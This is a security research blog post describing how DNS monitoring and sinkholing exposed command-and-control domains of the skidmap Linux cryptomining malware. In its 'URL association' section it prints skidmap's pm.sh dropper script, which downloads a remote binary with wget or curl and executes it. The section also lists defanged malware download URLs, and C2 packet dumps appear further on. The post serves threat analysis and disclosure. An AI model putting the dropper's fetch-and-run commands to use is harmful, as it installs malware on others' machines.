Skidmap and malicious DNS data mining

By Zaifeng Zhang on 19 Apr 2021

Tags: DNSSEC, Guest Post, Malware, measurement, security

As the foundation and core protocol of the Internet, the DNS protocol carries data that, to a certain extent, reflects a good deal of user behaviour, so security analysis of DNS queries can uncover malicious activities.

DGA and fastflux were early examples of malicious threats detected in the DNS. Although the specific methods for detecting these two types of malicious behaviour vary, the core of the detection is still based on pure DNS data. The main reason for this is that the key features of both types of malicious behaviour are evident in the DNS, and little or no external data is needed for fast and accurate detection.

In reality, however, the traces left by malware in DNS queries vary greatly depending on the purpose and environment (one example is the implementation of protocol stacks across OSes), making it difficult or impossible to efficiently complete the closed loop of data cleansing, aggregation, detection, verification, and defence by relying on DNS queries alone.

In the face of massive amounts of DNS data (and other basic data), big data analytics can produce many anomalous clues. Of course, producing accurate threat intelligence from that analysis is another story.

With today’s rapid development of data, computing power, and machine intelligence algorithms, we believe that one of the future directions in DNS security is the correlation and integration of massive amounts of DNS base data with other multi-dimensional data, which can lead to more in-depth and sophisticated analysis.

Using the DNSMon system

The 360Netlab team has been dedicated to DNS data security for six years, starting with the establishment of the first Passive DNS system in China in 2014. DNSMon is a way for 360Netlab to leverage its extensive DNS security analysis experience to systematically analyse hundreds of billions of daily DNS queries to produce threat intelligence (domain name Indicator of Compromise or IOC), which provides end users with the platform for security defence.

DNSMon has been running for nearly three years. This is how it works:

DNSMon cross-references the massive amount of DNS queries with the security-related data owned by 360Netlab (including whois, web, sandbox, honeypot, certificates, and similar), and analyses it to derive threat intelligence IOC.
The system actively blocks high-risk domain names on a large scale, by generating block lists with thousands of malicious and highly suspicious domain names every day, serving about 20 million users in China.

In operating DNSMon, we have learnt that it is common for the domains we intercept to take weeks or even months to enter other threat intelligence (domain name IOC) vendor lists.

In this article, we will look at the first example — the skidmap malicious mining program — and follow up with a series of articles and selected case studies that illustrate how to start with DNS queries and combine it with multi-dimensional data to produce domain name IOCs.

DNSMon’s blocking of unknown domains

In May 2019, with a built-in algorithm, DNSMon started to block the three subdomains of ipfswallet.tk, rctl-443/rctl/pm, and rctl-443.onlinetalk.tk. In November 2019, the rctl and info subdomains of onlinetalk.tk were also blocked. In September and October 2020, similar interceptions were performed on the rctl-443/rctl subdomains of googleblockchaintechnology[.]com, howoldareyou999[.]com, and franceeiffeltowers[.]com. The blocking information is shown in the following figure.

These domain names have strong similarities in domain name structure and the choice of subdomains. Further analysis of the behavioural pattern of their DNS requests shows that there is a very high degree of consistency. The graph below shows the access history of the domain names in question since August 2019.

Figure 2 — Access history of the domain names.

Graphical association

In general, if the domain names are similar in structure and use the same infrastructure, it is likely that the domain names play similar functions. For this purpose, we analysed the infrastructure and associations of these automatically blocked domains using the graph system, developed by 360netlab to perform graph correlation analysis on multidimensional data.

Figure 3 — Analyzing the infrastructure and associations of automatically blocked domains, using the graph system. — Figure 3 — Analysing the infrastructure and associations of automatically blocked domains, using the graph system.

In Figure 3 we can see that:

All query domains (the pentagram node in the second column) can be correlated with each other via IP, URL, and samples, indicating that they are indeed in the same infrastructure
Some new nodes are also expended, where the nodes pm.cpuminerpool[.]com, hxxp://pm.ipfswallet[.]tk/miner2, and hxxp://pm.ipfswallet[.]tk/miner have distinct characteristics of mining domains, and the related sample nodes are associated with shell scripts and ELF samples that perform mining functions

Domain associations

According to the September 2019 Trend Micro report, we can see the expended two sets of domain names in the above graphic are both skidmap malicious mining programs.

From this, it is almost certain the rctl series domain names are closely related to the skidmap mining program. DNSMon’s blocking time for domain names related to the skidmap malicious mining program (including the main download domain name pm[.] ipfswallet.tk was about four months earlier than the Trend Micro (2019.5 vs 2019.9).

URL association

After the analysis of graph correlation and domain association, we can determine that the emerging domain names are very closely related to the skidmap malicious mining program. In order to further determine the functionality of these new domains, we spliced the old URLs with the new domains to check if the new domains are taking over the functionality of the corresponding old domains. As it turns out, the corresponding malware can be successfully downloaded.

hxxp://rctl.googleblockchaintechnology[.]com/pc
hxxp://rctl.googleblockchaintechnology[.]com/pm.sh
hxxp://rctl.googleblockchaintechnology[.]com/miner2
hxxp://rctl.googleblockchaintechnology[.]com/miner
hxxp://rctl.googleblockchaintechnology[.]com/cos6.tar.gz
hxxp://rctl.googleblockchaintechnology[.]com/cos7.tar.gz

The downloaded samples are largely the same as those analysed in the Trendmicro article via the main download domain pm[.] ipfswallet.tk. For example, the contents of pm.sh are as follows:

PATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin

cd /var/lib


if [ -x "/usr/bin/md5sum" -o -x "/bin/md5sum" ];then
    sum=`md5sum pc|grep 42d271982608bd740bf8dd3458f79116|grep -v grep |wc -l`
    if [ $sum -eq 1 ]; then
        chmod +x /var/lib/pc
        /var/lib/pc
        exit 0
    fi
fi

/bin/rm -rf /var/lib/pc
if [ -x "/usr/bin/wget"  -o  -x "/bin/wget" ]; then
   wget -c hxxp://pm.cpuminerpool[.]com/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
elif [ -x "/usr/bin/curl"  -o  -x "/bin/curl" ]; then
   curl -fs hxxp://pm.cpuminerpool[.]com/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
elif [ -x "/usr/bin/get"  -o  -x "/bin/get" ]; then
   get -c hxxp://pm.cpuminerpool[.]com/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
elif [ -x "/usr/bin/cur"  -o  -x "/bin/cur" ]; then
   cur -fs hxxp://pm.cpuminerpool[.]com/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
elif [ -x "/usr/bin/url"  -o  -x "/bin/url" ]; then
   url -fs hxxp://pm.cpuminerpool[.]com/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
else
   rpm -e --nodeps wget
   yum -y install wget
   wget -c hxxp://pm.cpuminerpool[.]com/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
Fi

Data from sinkhole

Two new rctl domain names (howoldareyou999[.] com and franceeiffeltowers[.] com) were not registered by the malware author, but we saw there was already a significant amount of DNS request traffic, network wide. In order to figure out what these domains are actually for in the real network, we registered one of them, franceeiffeltowers[.] com and sinkholed it.

After observing the actual traffic to fanceeiffeltowers[.] com, we observed the following characteristics:

Communication via port 443.
TLS protocol interactions are required, but certification of the accessing domain is not verified (the certificate we provide does not match the certificate of the sinkhole domain).
After the TLS handshake, the payload length of the first packet received is 39 and is similar to the following (though the content of the bytes of packets from different client sources may vary):

00000000: 64 65 66 61 75 6C 74 00  00 00 00 00 00 00 00 00  default.........
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 00 16 3E 12 AE AD                              ...>...

Or something like this:

00000000: 63 34 00 00 00 00 00 00  00 00 00 00 00 00 00 00  c4..............
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 52 54 00 B8 EB E1                              .RT....

Instead of the obviously readable HTTP URL and the rest of the corresponding HTTP protocol that we would expect to see, this content is for C2 remote control connect.

On 13 November 2020, we found 689 IP addresses, of which 64% of the request source IPs were concentrated on Aliyun and Tencent cloud, as shown in Figure 4:

Figure 4 — Client and cloud distribution.

Because the rctl domains (whether registered or not) are very close to each other in terms of request patterns, and the DNSMon system can see that their companionship is very close, we have good reasons to believe that the registered domain name (googleblockchain[.]com) has the same client-side origin as the sinkhole domain name.

The sinkhole server received a total of 936,000 go-live requests (39 binary packets) in 24 hours, as shown in Figure 5.

Figure 5 — Go-live requests between 2300 on 13 November 2020 and 2300 on 14 November 2020. — Figure 5 — Go-live requests between 23:00 on 13 November 2020 and 23:00 on 14 November 2020.

Finding answers

From the various correlations mentioned above, it is almost certain the rctl series domain names must be related to the skidmap malicious mining program. However, the sinkhole data shows that the role of rctl domains is not the same as the disclosed skidmap-related domain name IOCs.

In order to figure out the real source of this traffic, we ‘infected’ skidmap again in a restricted environment. Unsurprisingly, we found a request for the rctl series domain, which was originally from /usr/bin/irqbalanced (ad303c1e121577bbe67b4615a0ef58dc5e27198b). It constantly tries to request the rctl* class domain, and we also noticed that rctl-related strings are in the hidden directory list of skidmap’s rootkit.

About ‘irqbalanced’

In a standard Linux system, irqbalance (location: /usr/sbin/irqbalance) is a service used to balance interrupts and improve performance. It does not issue any suspicious network requests to the outside.

The irqbalanced (location: /usr/bin/irqbalanced) mentioned above is part of the malicious program. It uses a similar name to confuse the analyst, and will communicate with the C2 server of the malicious program.

Analysis of the program revealed that it came from an open source remote control software called ‘rctl’ (it should be noted the author of the software and the hacker behind skidmap should not be considered the same person because of the open source nature), and the client program was modified to fit skidmap’s needs. However, the core protocol of the communication did not change, and the initial 39-byte-long data received by sinkhole was the first packet of the victim’s attempt to connect to the C2 master.

Since there was no significant change in the communication protocol, we modified the rctl server software slightly and, as expected, received numerous messages from victims after running the server on the sinkhole server.

Figure 6 — The console can perform batch remote command execution and single shell login for victims.

Figure 7 — Nearly 900 clients connected shortly after the server started, but the actual figure is probably much higher.

The connection efficiency of the remote control software is very high, with nearly 900 clients connected shortly after the server started. Considering the order in which clients request the master domain name when connecting, the real number of victims is probably much higher than this.

Complementing existing threat intelligence

We already know that through careful analysis of DNS data we can find various known and unknown threats. We have learnt that by cross-checking security related data we can intercept suspicious activities.

We have also shown that the IOCs generated by DNSMon are of great value to users with relatively high security requirements, and are a good complement to the existing threat intelligence generated based on traditional security analysis methods.

As mentioned earlier, we will follow up with another article covering the infection process, including the vulnerabilities skidmap uses to gain access to the victim, the malicious programs (rootkits) that it downloads, the functions of each malicious program, and more.

This post was adapted from NetLab 360 Blog.

Zhang Zaifeng is a malware researcher at NetLab 360.

Rate this article

The views expressed by the authors of this blog are their own and do not necessarily reflect the views of APNIC. Please note a Code of Conduct applies to this blog.